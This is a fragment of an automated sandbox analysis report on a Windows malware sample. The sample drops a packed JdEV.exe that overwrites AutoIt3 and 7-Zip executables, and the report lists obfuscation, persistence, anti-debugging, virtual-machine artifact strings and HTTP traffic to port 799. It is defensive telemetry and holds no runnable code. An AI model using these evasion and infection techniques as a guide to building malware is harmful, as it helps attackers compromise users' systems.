    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeSection loaded: ntvdm64.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeAutomated click: OK
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeAutomated click: OK
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: BXOZIGZEUa.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
    Source: BXOZIGZEUa.exeStatic file information: File size 1700352 > 1048576
    Source: BXOZIGZEUa.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x126a00
    Source: BXOZIGZEUa.exeStatic PE information: More than 200 imports for USER32.dll
    Source: BXOZIGZEUa.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
    Source: BXOZIGZEUa.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
    Source: BXOZIGZEUa.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
    Source: BXOZIGZEUa.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: BXOZIGZEUa.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
    Source: BXOZIGZEUa.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
    Source: BXOZIGZEUa.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
    Source: BXOZIGZEUa.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: Binary string: D:\Workspace\Driver\DriverUninstall\Release\DriverUninstall.pdb source: BXOZIGZEUa.exe
    Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.3.dr
    Source: BXOZIGZEUa.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
    Source: BXOZIGZEUa.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
    Source: BXOZIGZEUa.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
    Source: BXOZIGZEUa.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
    Source: BXOZIGZEUa.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

    Data Obfuscation

    barindex
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeUnpacked PE file: 3.2.JdEV.exe.340000.0.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 1_2_002D397D LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,1_2_002D397D
    Source: initial sampleStatic PE information: section where entry point is pointing to: uY
    Source: BXOZIGZEUa.exeStatic PE information: section name: uY
    Source: JdEV.exe.1.drStatic PE information: section name: .aspack
    Source: JdEV.exe.1.drStatic PE information: section name: .adata
    Source: MyProg.exe.3.drStatic PE information: section name: PELIB
    Source: MyProg.exe.3.drStatic PE information: section name: Y|uR
    Source: SciTE.exe.3.drStatic PE information: section name: u
    Source: Uninstall.exe.3.drStatic PE information: section name: EpNuZ
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 1_2_002BEB2E push ecx; ret 1_2_002BEB41
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 1_2_002BF1C5 push ecx; ret 1_2_002BF1D8
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeCode function: 3_2_00341638 push dword ptr [00343084h]; ret 3_2_0034170E
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeCode function: 3_2_00346014 push 003414E1h; ret 3_2_00346425
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeCode function: 3_2_00342D9B push ecx; ret 3_2_00342DAB
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeCode function: 3_2_0034600A push ebp; ret 3_2_0034600D
    Source: BXOZIGZEUa.exeStatic PE information: section name: uY entropy: 6.933836062310107
    Source: JdEV.exe.1.drStatic PE information: section name: .text entropy: 7.81169422100848
    Source: MyProg.exe.3.drStatic PE information: section name: Y|uR entropy: 6.934625577189198
    Source: SciTE.exe.3.drStatic PE information: section name: u entropy: 6.933790191594832
    Source: Uninstall.exe.3.drStatic PE information: section name: EpNuZ entropy: 6.9344305753247575

    Persistence and Installation Behavior

    barindex
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeSystem file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeFile created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeFile created: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeFile created: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to dropped file
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeFile created: C:\Users\user\AppData\Local\Temp\JdEV.exeJump to dropped file
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeFile created: C:\Users\user\Desktop\uninstall.logJump to behavior

    Hooking and other Techniques for Hiding and Protection

    barindex
    Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 799
    Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 799
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 1_2_0020814E IsWindowVisible,IsIconic,1_2_0020814E
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 1_2_0021A4EB GetParent,GetParent,IsIconic,GetParent,1_2_0021A4EB
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 1_2_00214603 IsIconic,PostMessageW,1_2_00214603
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 1_2_001E0624 SetForegroundWindow,IsIconic,1_2_001E0624
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 1_2_001E06C8 IsIconic,1_2_001E06C8
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 1_2_00212724 IsWindow,GetFocus,IsChild,SendMessageW,IsChild,SendMessageW,IsIconic,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,IsWindowVisible,1_2_00212724
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 1_2_002009D9 GetClientRect,IsRectEmpty,IsIconic,BeginDeferWindowPos,GetClientRect,IsRectEmpty,IsRectEmpty,EqualRect,GetWindowRect,GetParent,EndDeferWindowPos,1_2_002009D9
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 1_2_002131B3 GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,IsIconic,GetSystemMetrics,OffsetRect,GetSystemMetrics,IsIconic,GetSystemMetrics,GetSystemMetrics,1_2_002131B3
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 1_2_002131B3 GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,IsIconic,GetSystemMetrics,OffsetRect,GetSystemMetrics,IsIconic,GetSystemMetrics,GetSystemMetrics,1_2_002131B3
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 1_2_002131B3 GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,IsIconic,GetSystemMetrics,OffsetRect,GetSystemMetrics,IsIconic,GetSystemMetrics,GetSystemMetrics,1_2_002131B3
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 1_2_002134B3 IsWindowVisible,ScreenToClient,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetSystemMetrics,PtInRect,GetSystemMetrics,PtInRect,GetSystemMetrics,PtInRect,1_2_002134B3
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 1_2_001EB730 SetRectEmpty,RedrawWindow,ReleaseCapture,SetCapture,ReleaseCapture,SetCapture,SendMessageW,UpdateWindow,SendMessageW,IsWindow,IsIconic,IsZoomed,IsWindow,UpdateWindow,1_2_001EB730
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 1_2_00213A3E IsWindow,IsWindowVisible,GetWindowRect,PtInRect,GetAsyncKeyState,ScreenToClient,IsWindow,IsWindow,IsWindow,GetWindowRect,PtInRect,SendMessageW,PtInRect,SendMessageW,ScreenToClient,PtInRect,GetParent,SendMessageW,GetFocus,WindowFromPoint,SendMessageW,GetSystemMenu,IsMenu,EnableMenuItem,EnableMenuItem,EnableMenuItem,IsZoomed,IsIconic,EnableMenuItem,TrackPopupMenu,SendMessageW,1_2_00213A3E
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 1_2_001CE757 __EH_prolog3_GS,GetDeviceCaps,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DeleteObject,_memset,GetTextCharsetInfo,lstrcpyW,lstrcpyW,EnumFontFamiliesW,EnumFontFamiliesW,lstrcpyW,EnumFontFamiliesW,lstrcpyW,CreateFontIndirectW,CreateFontIndirectW,CreateFontIndirectW,CreateFontIndirectW,CreateFontIndirectW,CreateFontIndirectW,GetSystemMetrics,lstrcpyW,CreateFontIndirectW,GetStockObject,GetStockObject,GetObjectW,GetObjectW,lstrcpyW,CreateFontIndirectW,CreateFontIndirectW,GetStockObject,GetObjectW,CreateFontIndirectW,CreateFontIndirectW,__EH_prolog3_GS,GetVersionExW,KiUserCallbackDispatcher,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_001CE757
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 1_2_001C2540 SetupDiGetClassDevsW,SetupDiEnumDeviceInfo,GetLastError,GetLastError,GetLastError,GetLastError,SetupDiGetDeviceRegistryPropertyW,SetupDiGetDeviceRegistryPropertyW,GetLastError,GetLastError,GetLastError,LocalFree,LocalAlloc,SetupDiGetDeviceRegistryPropertyW,GetLastError,GetLastError,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,SetupDiCallClassInstaller,SetupDiEnumDeviceInfo,SetupDiDestroyDeviceInfoList,1_2_001C2540
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeDropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_3-1066
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeAPI coverage: 5.2 %
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeCode function: 3_2_00341718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 00341754h3_2_00341718
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 1_2_001CB7F2 lstrlenW,SetLastError,FindFirstFileW,GetLastError,__wfullpath,__wsplitpath_s,__wmakepath_s,1_2_001CB7F2
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 1_2_001CB3FE GetModuleHandleW,GetProcAddress,FindFirstFileW,1_2_001CB3FE
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 1_2_001DD5ED __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,1_2_001DD5ED
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeCode function: 3_2_003429E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,3_2_003429E2
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeCode function: 3_2_00342B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,3_2_00342B8C
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\Jump to behavior
    Source: Amcache.hve.3.drBinary or memory string: VMware
    Source: Amcache.hve.3.drBinary or memory string: VMware-42 27 b7 a3 1e b0 86 f3-0a fe 06 07 d0 80 07 92
    Source: Amcache.hve.3.drBinary or memory string: VMware Virtual USB Mouse
    Source: Amcache.hve.3.drBinary or memory string: vmci.syshbin
    Source: Amcache.hve.3.drBinary or memory string: VMware, Inc.
    Source: Amcache.hve.3.drBinary or memory string: VMware20,1hbin@
    Source: Amcache.hve.3.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
    Source: Amcache.hve.3.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
    Source: Amcache.hve.3.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
    Source: JdEV.exe, 00000003.00000003.1379761142.0000000001215000.00000004.00000020.00020000.00000000.sdmp, JdEV.exe, 00000003.00000002.1613503596.0000000001250000.00000004.00000020.00020000.00000000.sdmp, JdEV.exe, 00000003.00000002.1613503596.0000000001215000.00000004.00000020.00020000.00000000.sdmp, JdEV.exe, 00000003.00000003.1379761142.0000000001250000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: Amcache.hve.3.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
    Source: BXOZIGZEUa.exe, 00000001.00000002.1370356024.0000000000D3E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @SYSTEM:vmci.inf_amd64_68ed49469341f563P
    Source: Amcache.hve.3.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
    Source: Amcache.hve.3.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
    Source: Amcache.hve.3.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
    Source: BXOZIGZEUa.exe, 00000001.00000002.1370356024.0000000000D3E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @SYSTEM:vmci.inf_amd64_68ed49469341f563
    Source: Amcache.hve.3.drBinary or memory string: vmci.sys
    Source: Amcache.hve.3.drBinary or memory string: vmci.syshbin`
    Source: Amcache.hve.3.drBinary or memory string: \driver\vmci,\driver\pci
    Source: Amcache.hve.3.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
    Source: Amcache.hve.3.drBinary or memory string: VMware20,1
    Source: Amcache.hve.3.drBinary or memory string: Microsoft Hyper-V Generation Counter
    Source: Amcache.hve.3.drBinary or memory string: NECVMWar VMware SATA CD00
    Source: Amcache.hve.3.drBinary or memory string: VMware Virtual disk SCSI Disk Device
    Source: Amcache.hve.3.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
    Source: Amcache.hve.3.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
    Source: Amcache.hve.3.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
    Source: Amcache.hve.3.drBinary or memory string: VMware PCI VMCI Bus Device
    Source: Amcache.hve.3.drBinary or memory string: VMware VMCI Bus Device
    Source: Amcache.hve.3.drBinary or memory string: VMware Virtual RAM
    Source: BXOZIGZEUa.exe, 00000001.00000002.1371046357.0000000002B78000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware.0
    Source: JdEV.exe, 00000003.00000003.1379761142.00000000011CE000.00000004.00000020.00020000.00000000.sdmp, JdEV.exe, 00000003.00000002.1613503596.00000000011CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWL
    Source: Amcache.hve.3.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
    Source: Amcache.hve.3.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeAPI call chain: ExitProcess graph end nodegraph_3-1041
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 1_2_002BC787 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_002BC787
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 1_2_002D397D LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,1_2_002D397D
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 1_2_00366044 mov eax, dword ptr fs:[00000030h]1_2_00366044
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 1_2_002D9DE5 __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,1_2_002D9DE5
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 1_2_002BC787 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_002BC787
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 1_2_002C3EF0 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_002C3EF0
    Source: SciTE.exe.3.drBinary or memory string: Ctrl+RightLeftDownUpDecimalMinusMultiplyDivideTabSpaceDeleteEscapeEndInsertEnterHomeForwardBackwardPLAT_WIN1PageDownPageUpMenuWinSciTEACCELSSciTEWindowContentSciTEWindowPLAT_WINNT1toolbar.largecreate.hidden.consolegbkbig5euc-krshift_jisutf-8asciilatin2latin1translation.encodingwindows-1251ScaleFactoriso-8859-5cyrillic1250iso8859-11SciTE_HOMEAppsUseLightThemeSciTE_USERHOMESciTE_HOMEPropertiesScaleFactorSoftware\Microsoft\Windows\CurrentVersion\Themes\PersonalizeEmbeddedRich Text FormatButtonShell_TrayWndUSERPROFILESciTE_HOMEHtmlHelpWHHCTRL.OCX
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,1_2_002D22DF
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,1_2_002D2767
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,1_2_002D27CE
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,1_2_002D280A
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: GetLocaleInfoW,__snwprintf_s,LoadLibraryExW,1_2_001C8F07
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: GetLocaleInfoA,1_2_002D5C9F
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 1_2_001C2540 SetupDiGetClassDevsW,SetupDiEnumDeviceInfo,GetLastError,GetLastError,GetLastError,GetLastError,SetupDiGetDeviceRegistryPropertyW,SetupDiGetDeviceRegistryPropertyW,GetLastError,GetLastError,GetLastError,LocalFree,LocalAlloc,SetupDiGetDeviceRegistryPropertyW,GetLastError,GetLastError,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,SetupDiCallClassInstaller,SetupDiEnumDeviceInfo,SetupDiDestroyDeviceInfoList,1_2_001C2540
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 1_2_002C20CC GetSystemTimeAsFileTime,__aulldiv,1_2_002C20CC
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 1_2_002CB21D __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,1_2_002CB21D
